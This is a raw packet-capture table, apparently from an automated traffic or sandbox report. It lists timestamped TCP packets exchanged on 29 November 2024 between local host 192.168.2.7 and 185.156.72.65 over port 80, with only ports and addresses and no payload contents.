Nov 29, 2024 19:50:37.045707941 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.046309948 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.046360016 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.046415091 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.046452045 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.047199965 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.047247887 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.047319889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.047357082 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.048090935 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.048104048 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.048130989 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.048151016 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.048943043 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.048983097 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.049046040 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.049087048 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.049803019 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.049885988 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.049911976 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.049948931 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.050668001 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.050712109 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.050813913 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.050914049 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.051592112 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.051632881 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.051716089 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.051750898 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.052416086 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.052453995 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.052494049 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.052527905 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.053260088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.053296089 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.053325891 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.053359985 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.054167032 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.054203987 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.054277897 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.054313898 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.055011034 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.055073023 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.055103064 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.055103064 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.056004047 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.056045055 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.056068897 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.056103945 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.056740999 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.056778908 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.056863070 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.056900024 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.057610989 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.057646990 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.057746887 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.057781935 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.058514118 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.058557987 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.058574915 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.058612108 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.059355021 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.059393883 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.059437037 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.059472084 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.060210943 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.060247898 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.060301065 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.060333967 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.061073065 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.061109066 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.061204910 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.061237097 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.061974049 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.062011003 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.062099934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.062135935 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.062810898 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.062854052 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.063010931 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.063043118 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.063751936 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.063788891 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.063918114 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.063952923 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.064615965 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.064626932 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.064654112 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.064676046 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.065445900 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.065483093 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.065530062 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.065562010 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.066344023 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.066390038 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.066402912 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.066443920 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.133095980 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.133150101 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.133189917 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.133220911 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.133472919 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.133522034 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.133538008 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.133573055 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.134355068 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.134409904 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.134442091 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.134473085 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.135178089 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.135226011 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.140743971 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.140786886 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.140861034 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.140897036 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.141199112 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.141239882 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.141287088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.141328096 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.142047882 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.142087936 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.142122030 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.142158985 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.142916918 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.142956018 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.143037081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.143079042 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.143781900 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.143830061 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.143889904 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.143928051 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.144654989 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.144692898 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.144737005 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.144804001 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.145512104 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.145556927 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.145644903 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.145683050 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.146416903 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.146455050 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.146475077 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.146512032 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.147259951 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.147300959 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.147387028 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.147429943 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.148121119 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.148169994 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.148221016 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.148257017 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.148983002 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.149025917 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.149087906 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.149121046 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.149867058 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.149909973 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.150038004 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.150077105 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.150717974 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.150755882 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.150816917 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.150852919 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.151657104 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.151702881 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.151797056 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.151842117 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.152476072 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.152512074 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.152590990 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.152626038 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.153367043 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.153408051 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.153429985 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.153467894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.154181957 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.154227018 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.154262066 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.154299021 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.155090094 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.155164003 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.155179977 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.155211926 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.155946970 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.155987978 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.156049967 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.156097889 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.156826973 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.156888962 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.156944990 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.156984091 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.157690048 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.157738924 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.157805920 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.157838106 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.158529997 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.158570051 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.158637047 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.158684015 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.159421921 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.159466982 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.159538984 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.159583092 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.160332918 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.160375118 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.160430908 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.160489082 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.161266088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.161278009 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.161304951 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.161320925 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.245888948 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.245978117 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.245990038 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.246016026 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.246294975 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.246306896 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.246337891 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.247075081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.247083902 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.247119904 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.247801065 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.247812986 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.247844934 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.248506069 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.248548031 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.248565912 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.248600960 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.249264002 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.249305964 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.249424934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.249463081 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.250235081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.250272989 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.250320911 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.250360012 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.251249075 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.251261950 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.251281977 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.251306057 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.252135992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.252146959 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.252218962 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.253082991 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.253094912 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.253128052 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.254149914 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.254163027 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.254201889 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.255089998 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.255103111 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.255131006 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.255331039 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.255364895 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.255410910 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.255446911 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.256215096 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.256257057 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.256266117 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.256303072 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.257683039 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.257694960 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.257721901 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.257744074 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.257988930 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.258022070 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.258337975 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.258380890 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.258786917 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.258829117 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.259037971 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.259079933 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.259684086 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.259733915 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.259871960 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.259916067 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.260902882 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.260915041 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.260961056 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.260961056 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.261439085 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.261476994 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.261559963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.261600018 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.262382984 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.262394905 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.262422085 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.263217926 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.263276100 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.263348103 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.263386011 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.264081001 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.264122009 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.264126062 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.264163971 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.264930010 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.264949083 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.264974117 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.264991045 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.265821934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.265834093 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.265908957 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.266659975 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.266701937 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.266777992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.266812086 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.267427921 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.267466068 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.334429026 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.334522963 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.334553957 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.334594011 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.334841967 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.334880114 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.334961891 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.334997892 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.335846901 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.335860014 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.335880995 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.335901976 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.336774111 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.336786032 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.336807013 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.336823940 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.337742090 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.337755919 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.337793112 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.337804079 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.338268995 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.338305950 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.338342905 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.338378906 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.339121103 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.339160919 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.339276075 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.339308977 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.340043068 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.340085983 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.340867043 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.340878963 CET	80	49700	185.156.72.65	192.168.2.7
